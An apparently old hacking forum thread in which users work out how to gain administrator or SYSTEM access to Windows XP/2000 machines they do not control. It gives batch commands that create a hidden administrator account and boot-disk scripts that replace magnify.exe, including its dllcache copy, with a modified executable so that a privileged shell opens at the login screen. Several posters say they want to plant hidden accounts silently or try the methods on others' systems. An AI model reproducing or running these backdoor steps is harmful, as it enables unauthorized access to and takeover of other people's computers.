Gain SYSTEM/Administrative Access to Windows XP/2000

[djhiran]

No hard work to be done to gain access to NTFS partitions of XP with winhex!!!

[detox420]

So how would i be able to integrate this with switchblade on my U3?

[GonZor]

So how would i be able to integrate this with switchblade on my U3?

Which part? reading through the thread there is a lot of information here.

[detox420]

Well the part where you can silently put a hidden admin account on the computer it is being used on. I KNOW its possible because my good friend has done it but he refuses to give out the code for it.

[Xqtftqx]

I dont know if somebody already said this above. i dont have all day to read this.

You can easly do this with batch.

net user Bob /add
net user Bob Bobby
net localgroup Administrators /add Bob

Put that in a batch file and run it on the computer.

It will make a user account "Bob"

the password will be Bobby.

And then you got a administrators account

You can make one to remove it as well

net user Bob /delete

There you go. have fun

[SomeoneE1se]

again, you already have to have administrator access to do that!

[Joerg]

I did set up a bootdisk with ntfs4dos to copy a compiled batch into the system32 folder (magnify.exe).

By pressing {Win}+{U} and starting the magnifier you have a administrator account.

This does not require administrator rights, but needs physical access.

[kickarse]

Perhaps we should outline our basic plan of action. It seems we all need the described ----

1. Find an exe/dll hook that Windows uses in an Administrative privileged state AND with the ability to be modified/saved/edited/run by guest or everyone.

2. Get that exe to be loaded by Administrator and/or System AND spawn/run our extra code/payload that adds a user and password or escalates guest to Administrator access.

3. Finally, and not really needed, replaced fixed exe with normal exe to remove trace.

----

Does magnify.exe have the ability to be modified by guest or everyone??

[mexxus]

Hmmmm.

Interesting work...

I wonder if Microsoft will block access to exes if they find out, but they cant can they, otherwise windows wont load, and they cant block you from running the neat appy, as it is part of windows, but domain admins could put it in the block list.

Usually accounts, even those on a domain have access to c:. Since utilman.exe is't really a core appy, it isn't as highly protected as others and isnt always running, so good choice there microsoft.........

Sounds interesting, but lethal... I have treid the net commands in vista home premium and they don't work on my account (though its admin, but vista and admin are two different things...are you sure u wanna run that....access denied...but I chose my account to be an admin....too bad)

I'm sure this would work even in a limited account (so long as access to c:)

---

mexxus

[Joerg]

@kickarse: the magnify.exe is a system file, so replacing is only possible by an administrator (or a person having admin rights) or by booting from another os. But it can be started by everyone.

The difficult part is, that you need admin rights instantly and not the dirty way by booting another operating system.

EDIT: http://oxid.netsons.org/phpBB2/viewtopic.php?p=4578

To make a long story short, you create a service which calls the cmd.exe with SYSTEM rights.

To prove that you have system rights, you can change into the system volume information folder.

But as alway, you need admin rights.

[Leapo]

wouldn't be that hard, really. All that's required DOS boot floppy (or CD) with an NTFS driver that automatically runs a batch file that replaces Magnify.exe with your modified version.

Insert floppy (or bootable CD) > boot machine > script runs > reboot into windows > use exploit

Edit: Here's all the code that's required for the batch file:

copy C:WINDOWSsystem32magnify.exe C:WINDOWSsystem32magnify_bak.exe
del C:WINDOWSsystem32magnify.exe
copy .magnify.exe C:WINDOWSsystem32
exit

And this will undo it:

del C:WINDOWSsystem32magnify.exe
copy C:WINDOWSsystem32magnify_bak.exe C:WINDOWSsystem32magnify.exe
del C:WINDOWSsystem32magnify_bak.exe
exit

Yes, I know I could have used "ren" instead of "copy" and "del", but I've had issues doing it that way without actually changing to the working directory. This will work for sure.

[Joerg]

Ehm, i actually did that some time ago ;)

@echo on
FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %i:ntldr SET SYS=%i
FOR %a IN (windows winnt) DO IF EXIST %sys%:%asystem32winlogon.exe SET WIN=%a

copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y
copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y

This does work on 2k and on xp

And i set up a bootdisc with ntfs4dos, look here

[Anthrax]

what can i use to make a NTFS bootable cd?

iv only got a win98 boot cd

[Joerg]

i used ntfs4dos but i'm sure there are better solutions

You format the disc using the ntfs4dos prog and copy the files of bootdisc.zip onto the disc.

// note to myself: read

[Anthrax]

figured that part.

anyone got an image or something of a NTFS bootcd?

[ihackwindows]

Too long to read it all so i would say yo could make a program that copy's the files over quickly without prompt (i use c++). Then reboots you computer.

[Joerg]

By th way, I tested the system file protection of windows xp.

I replaced the files and hit reset on my virtual machine.

After that, the files were still there (replaced).

Can someone confirm this?

[GonZor]

Can someone confirm this?

It may have something to do with the lack of sleep but your post didn't quite make sense to me... If your asking will the "fake" files still be there on reboot, yes I think someone stated earlier in this thread that windows only checks for the files existence not the integrity of the file.

[Joerg]

Yeah, i love posting nonsense ;)

I meant that windows didn't replaced the patched files after a forced reboot, but i think it's because i deactivated the sfc on my vm, so never mind and ignore this and my last post

[Leapo]

Ehm, i actually did that some time ago ;)

@echo on
FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %i:ntldr SET SYS=%i
FOR %a IN (windows winnt) DO IF EXIST %sys%:%asystem32winlogon.exe SET WIN=%a

copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y
copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y

This does work on 2k and on xp

And i set up a bootdisc with ntfs4dos, look here

that works, but isn't it a tad bloated and overcomplicated? The way I wrote it up doesn't need to search every drive in the system to work...

[Joerg]

Yes, your script works for all standard xp/vista machines.

My script works for all 2000/xp/vista systems installed on another partition then C:

For me it is more important to make the script work on any pc (running windows)

[XtremeModifier]

Cool... I am going to have to try these methods on one of the many ""Personal"" systems

Currently have used Live Linux Tools to change the admin password for 2000 and XP, and then I am in in about 3 minutes or so. Great for users who lock themselves out of their own systems .. ha ha

[K1u]

Yes, your script works for all standard xp/vista machines.

My script works for all 2000/xp/vista systems installed on another partition then C:

For me it is more important to make the script work on any pc (running windows)

Could you not just use %systemdrive% ?

[GonZor]

Yes, your script works for all standard xp/vista machines.

My script works for all 2000/xp/vista systems installed on another partition then C:

For me it is more important to make the script work on any pc (running windows)

Could you not just use %systemdrive% ?

Thats only if you want to make it simple... or to simplify it further just use %systemroot%  :-P

[Joerg]

Ehm, if you try this you'll get some nice errors ;)

I'm booting from a dos floppy so I don't have systemvariables

If it would be so easy, I would have done this.

A problem I spotted is, if someone has more than just 1 windows nt system installed, that the script just copies it once.